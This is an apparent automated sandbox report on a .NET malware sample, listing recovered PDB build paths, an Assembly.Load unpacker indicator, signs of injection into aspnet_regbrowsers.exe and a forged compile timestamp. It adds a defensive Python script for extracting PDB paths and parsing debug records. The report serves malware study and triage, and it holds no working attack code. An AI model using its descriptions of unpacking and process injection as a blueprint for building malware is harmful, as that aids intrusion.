                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: lC:\Users\user\Desktop\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: tuneraidfix.pdb source: WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb:8 source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb; source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: D .pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000A.00000003.271728501.0000000003125000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270300201.0000000003125000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000A.00000003.285031636.0000000005501000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdbRSDS source: WER343.tmp.dmp.10.dr
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Microsoft.VisualBasic.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.pdbMZ source: WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.pdb source: W7UbgU8x18.exe, 00000000.00000000.256471113.00000000028DD000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: tuneraidfix.pdb<qA source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: fixedhost.pdb source: W7UbgU8x18.exe, 00000000.00000000.261864579.0000000002860000.00000004.00020000.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Core.pdbq source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\tuneraidfix.pdb] source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000A.00000003.285168837.00000000054D0000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: W7UbgU8x18.exe, 00000000.00000002.302413121.0000000000BAE000.00000004.00000020.sdmp, W7UbgU8x18.exe, 00000000.00000000.255992862.0000000000BAE000.00000004.00000020.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000A.00000003.271474632.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270327702.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.270696517.0000000003137000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000003.271114110.0000000003137000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000A.00000003.285188895.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284978604.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285080721.00000000054D7000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: System.Xml.ni.pdb0 source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: Zsymbols\exe\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: l8C:\Windows\tuneraidfix.pdb source: W7UbgU8x18.exe, 00000000.00000002.301641662.00000000005A8000.00000004.00000001.sdmp, W7UbgU8x18.exe, 00000000.00000000.260367500.00000000005A8000.00000004.00000001.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdbi source: WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb" source: WerFault.exe, 0000000A.00000003.284933803.00000000054E7000.00000004.00000001.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284964542.00000000054D1000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000002.300956712.00000000057B0000.00000004.00000001.sdmp, WER343.tmp.dmp.10.dr
                      Source: Binary string: cryptbase.pdbk source: WerFault.exe, 0000000A.00000003.284847253.00000000054D2000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000A.00000003.285204037.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.285099553.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284989581.00000000054DA000.00000004.00000040.sdmp, WerFault.exe, 0000000A.00000003.284866428.00000000054DA000.00000004.00000040.sdmp
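                      The entries above are PDB paths that the sandbox recovered from process memory and from the WER crash dump; the trailing characters on some of them ("mscorlib.pdbx", "psapi.pdb;", "tuneraidfix.pdb<qA") are whatever byte followed the path in memory, and the full build path "C:\Users\Administrator\Desktop\Builder\stub\1605780553\un_priv\tuneraidfix\obj\Release\tuneraidfix.pdb" is the most useful one for clustering samples from the same builder. As an added example, not code from Joe Sandbox or from the sample, the following Python script does the same triage on a raw dump: it pulls PDB paths out of a byte blob without the trailing junk, parses any RSDS CodeView records into the GUID/age key a symbol server would use, and decodes a PE TimeDateStamp such as the one reported for this sample. The dump fragment and the GUID in the RSDS record are constructed for illustration.

```python
"""Triage helpers for the "Binary string: ...pdb" artifacts that a sandbox pulls
out of process memory: recover PDB paths from a raw dump, parse RSDS CodeView
records into the key a symbol server uses, and sanity-check a PE TimeDateStamp.
Added example; not code from Joe Sandbox or from the analysed sample.
"""
import re
import struct
import uuid
from datetime import datetime, timedelta, timezone
from typing import Optional

# Characters a PDB path may contain, followed by the ".pdb" suffix. The lazy
# quantifier stops at the first ".pdb", so stray bytes that FOLLOW the suffix in
# a dump ("mscorlib.pdbx", "psapi.pdb;") are never captured. Stray bytes that
# PRECEDE a rooted path ("lC:\Users\...") are captured and trimmed afterwards.
PDB_RE = re.compile(rb"[\w .:\\\-()$%?]{1,260}?\.pdb", re.IGNORECASE)
DRIVE_RE = re.compile(rb"[A-Za-z]:\\")
NT_PREFIXES = (b"\\??\\", b"\\\\?\\")  # the \??\ and \\?\ object-manager prefixes


def normalize_pdb_path(raw: bytes) -> str:
    """Drop junk before a drive letter; keep NT object-manager prefixes."""
    for prefix in NT_PREFIXES:
        i = raw.find(prefix)
        if i >= 0:
            return raw[i:].decode("latin-1")
    m = DRIVE_RE.search(raw)
    if m:
        raw = raw[m.start():]
    return raw.decode("latin-1")


def extract_pdb_paths(blob: bytes) -> list:
    """Every distinct PDB path in a dump or file, in order of first appearance."""
    found = [normalize_pdb_path(m.group(0)) for m in PDB_RE.finditer(blob)]
    return list(dict.fromkeys(found))


def parse_rsds(blob: bytes) -> list:
    """Parse CodeView RSDS records: 'RSDS' + GUID (16 bytes, little-endian
    layout) + age (u32 LE) + NUL-terminated path. symbol_id is the GUID hex
    plus the age in hex, which is the directory name a symbol server uses."""
    records = []
    pos = blob.find(b"RSDS")
    while pos >= 0:
        if pos + 24 <= len(blob):  # skip a truncated record at the end of the blob
            guid = uuid.UUID(bytes_le=blob[pos + 4:pos + 20])
            age = struct.unpack_from("<I", blob, pos + 20)[0]
            end = blob.find(b"\x00", pos + 24)
            if end < 0:
                end = len(blob)
            path = blob[pos + 24:end].decode("latin-1")
            records.append({"guid": str(guid), "age": age, "path": path,
                            "symbol_id": f"{guid.hex.upper()}{age:X}"})
        pos = blob.find(b"RSDS", pos + 4)
    return records


def pe_timestamp(ts: int, now_ts: Optional[int] = None):
    """Decode a PE TimeDateStamp. The flag is True when the claimed build time
    lies after `now_ts` (epoch seconds, default: current time), i.e. forged."""
    epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
    built = epoch + timedelta(seconds=ts)  # portable for years beyond 2038
    now = epoch + timedelta(seconds=now_ts) if now_ts is not None else datetime.now(timezone.utc)
    return built, built > now


# Constructed memory-dump fragment modelled on the report's strings. The NULs
# stand in for the bytes between strings in a real dump; the GUID is made up.
SAMPLE_DUMP = (
    b"\x00\x00lC:\\Users\\user\\Desktop\\tuneraidfix.pdb\x00"
    b"\x00mscorlib.pdbx\x00\x00"
    b"C:\\Users\\Administrator\\Desktop\\Builder\\stub\\1605780553\\un_priv"
    b"\\tuneraidfix\\obj\\Release\\tuneraidfix.pdb:8\x00"
    b"\x00\\??\\C:\\Windows\\tuneraidfix.pdb]\x00"
)
SAMPLE_GUID = uuid.UUID("12345678-1234-5678-1234-567812345678")  # constructed
SAMPLE_RSDS = (
    b"\x00\x00RSDS" + SAMPLE_GUID.bytes_le + struct.pack("<I", 1)
    + b"C:\\Users\\Administrator\\Desktop\\Builder\\stub\\1605780553\\un_priv"
    b"\\tuneraidfix\\obj\\Release\\tuneraidfix.pdb\x00\x00"
)

if __name__ == "__main__":
    for p in extract_pdb_paths(SAMPLE_DUMP):
        print("pdb path:", p)
    for r in parse_rsds(SAMPLE_RSDS):
        print("rsds:", r)
    built, forged = pe_timestamp(0xCB1B3270)  # the TimeDateStamp from this report
    print("TimeDateStamp:", built.isoformat(), "in the future:", forged)
```

Run it against a minidump or a `.sdmp` region instead of SAMPLE_DUMP to get the same list the report shows, minus the trailing junk; the RSDS parser works on the raw PE file too, because the debug directory's CodeView blob is stored inline in the image.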

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: W7UbgU8x18.exe, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.1.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.W7UbgU8x18.exe.410000.5.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.W7UbgU8x18.exe.410000.0.unpack, duckclass.cs .Net Code: duckchoiceselector System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Code function: 0_2_0272B7B2 push ds; retf
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Code function: 0_2_0272545A push ds; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_064635A8 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464245 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464241 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646424D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464249 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464255 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464251 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646425D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464259 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464265 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464261 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646426D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464269 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464275 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464271 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646427D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464279 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464205 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464201 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646420D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464209 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464215 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464211 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646421D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464219 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464225 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464221 push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_0646422D push es; iretd
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Code function: 2_2_06464229 push es; iretd
                      Note: the 28 aspnet_regbrowsers.exe hits between 0x06464201 and 0x0646427D lie at 4-byte intervals inside one 128-byte region and all decode to the same two-byte sequence (push es; iretd), which is what a repeating data pattern looks like when it is disassembled at successive offsets; they are most likely one block of data in the injected process, not 28 separate obfuscated functions.
                      Source: W7UbgU8x18.exe Static PE information: 0xCB1B3270 [Fri Dec 24 07:40:32 2077 UTC] (the compile timestamp lies decades in the future, so the TimeDateStamp field has been forged)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\W7UbgU8x18.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess information set: NOOPENFILEERRORBOX
